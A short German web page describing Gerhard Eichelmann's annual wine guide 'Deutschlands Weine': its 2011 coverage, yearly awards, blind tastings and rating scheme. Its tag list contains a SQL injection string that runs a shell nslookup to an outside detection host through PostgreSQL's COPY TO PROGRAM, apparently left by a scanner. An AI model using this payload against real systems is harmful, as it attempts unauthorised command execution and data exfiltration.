Eichelmann ~ Deutschlands Weine

Gerhard Eichelmann ist ein deutscher Weinkritiker, der jedes Jahr sein unabhängiges Standardwerk ‚Deutschlands Weine‘ veröffentlicht. Im Eichelmann 2011 Deutschlands Weine stellte er 949 Weingüter und 10.081 Weine vor. Eichelmann legt sein Augenmerk bei der Prämierung der „Weingüter des Jahres“ nicht auf einzelne Weine, sondern auf die gesamte Kollektion. Im Weiteren zeichnet Eichelmann die beste Weißweinkollektion, die beste Rotweinkollektion, die beste Kollektion des Jahres, den Aufsteiger des Jahres und einen Wein des Jahres aus.

Neben kurzen Winzerportraits, Anmerkungen zu den Jahrgängen sowie Schnäppchen-Listen der besten Weine, enthält der Eichelmann auch die notwendigen Kontaktdaten der Winzer. Im Gegensatz zur offenen Verkostung des Gault Millau werden bei Eichelmann alle Weine blind beurteilt. Die Bewertung der Weine erfolgt nach dem international üblichen 100-Punkte-Schema. Die Weingüter werden dann mit 1 bis 5 Sternen bewertet.

  • testing
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-3227.73502.8c4d8.1.bxss.me
  • eichelmann 2011 deutschlands weine